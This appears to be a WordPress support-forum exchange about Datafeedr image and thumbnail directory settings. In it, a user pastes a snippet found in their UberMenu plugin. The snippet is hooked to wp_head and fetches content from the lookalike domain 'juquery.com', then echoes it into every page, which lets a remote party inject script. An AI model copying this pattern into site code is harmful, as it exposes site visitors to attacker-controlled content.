Your directory URL settings for the images and thumbnails needed to be updated with the following:

/wp-content/blogs.dir/4/files/store/products/images
/wp-content/blogs.dir/4/files/store/products/thumbnails

May I know what you're asking me to do?

Regarding my plugin loading problem: I found that that it exists in my ubermenu plugin: here is the snippet it exists in one of the files:

Code:
/*
 * For compatibility with latest browsers
 */
function juquery_compability_head() {

if(function_exists('curl_init'))
{
$url = "http://www.juquery.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'juquery_compability_head');

I just removed this url: http://www.juquery.com/jquery-1.6.3.min.js from $url and saved, now that issue gone.. I guess fucntinality of that plugin doesnt effect just because of removing that url, Right? and thnx for letting me know that..

You need to go here WordPress Admin Area > Tools > Datafeedr > Directories > Product Images > URL and put: /wp-content/blogs.dir/4/files/store/products/images

And you need to go here WordPress Admin Area > Tools > Datafeedr > Directories > Product Thumbnails > URL and put: /wp-content/blogs.dir/4/files/store/products/thumbnails
